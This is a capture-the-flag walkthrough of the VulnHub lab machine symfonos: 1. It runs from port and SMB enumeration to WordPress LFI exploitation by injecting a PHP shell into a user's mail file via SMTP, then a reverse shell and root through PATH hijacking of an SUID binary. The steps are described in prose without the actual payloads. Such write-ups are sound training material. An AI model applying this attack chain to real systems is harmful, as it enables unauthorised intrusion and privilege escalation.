VulnHub: symfonos: 1

Initial foothold

  1. Network discovery

My target is 192.168.60.131.

2. Port scan

There’re 5 open ports: 22, 25, 80, 139 and 445.

3. OS and service scan

There’re 4 services as listed:

  • 22/tcp ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
  • 25/tcp smtp Postfix smtpd
  • 80/tcp http Apache httpd 2.4.25 ((Debian))
  • 139/tcp and 445/tcp netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

4. Vuln scan

There’s is directory discovered on HTTP port 80.

Service Enumeration

  1. Starting w/ SSH connection om port 22

Connection verified

2. Connect to SMTP on port 25

Connection verified

3. nikto scan on HTTP

More directory to explore

4. Directory scan w/ gobuster, I used 3 different wordlists.

4. Access the site, explore every possible pages, not much of information revealed.

5. Scan SMB (port 139,445) w/ nmap

There’re anonymous and helios directories.

6. Access SMB:anonymous directory

There’s attention.txt

Download and read it

It’s a password hint.

Save these passwords as ‘pass_from_smb.txt’

Now I know that there’s username:helios and 3 possible passwords.

7. Access SMB:helios directory, It’s not available for anyone. I’ll try to access w/ username:helios

Download them

Read them

There’s string “/h3l105/”. My guess, it’s a hidden directory on HTTP service.

8. Access http://192.168.60.131/h3l105/

It’s a WordPress site.

View page source, there’s “symfonol.local” hostname.

Edit /etc/hosts by adding IP and name

Refresh HTTP site, now It’s pretty.

9. Enumerate http://symfonos.local/h3l105/, not much on the site.

nikto scan

Directory scan

10. Wordpress scan

Plugin scan

Plugin: mail-masta v.1.0 has LFI vulnerability

11. WordPress password bruteforcing

No passwords found

Change wordlist to rockyou.txt

I will leave it to scan and checkback later.

Beautify the result by viewing page source

2. Since the machine has SMTP service which I can also access. I may able to access service’s related files.

Starting w/ “/var/log/mail.log”

No result

Another possibility is helios’s mail, the path is “/var/mail/helios”

I got the result. FromI can inject PHP shell to helios’s mail and acceed it w/ LFI.

3. Access SMTP service and inject the shell

4. Test the shell

Now, the shell is working as expected.

5. Reverse shell

Prepare listener

I will used commands from this cheatsheet.

After many tries, I succeeded w/ this command

Here’s how I did it.

Intercept LFI request w/ Burp Suite

Send the request to the Repeater

Encode reverse shell command to URL

Paste it to the request and send

Back to listener, now I got the shell.

Privilege Escalation

  1. Import TTY shell

2. Explore the machine

I identified a binary called statuscheck

Run it

3. I suspected that It must be SUID

4. strings statuscheck to identify any command usage inside the binary

It calls “curl” command.

5. Create fake path of curl

Now I’m root.

6. Read the flag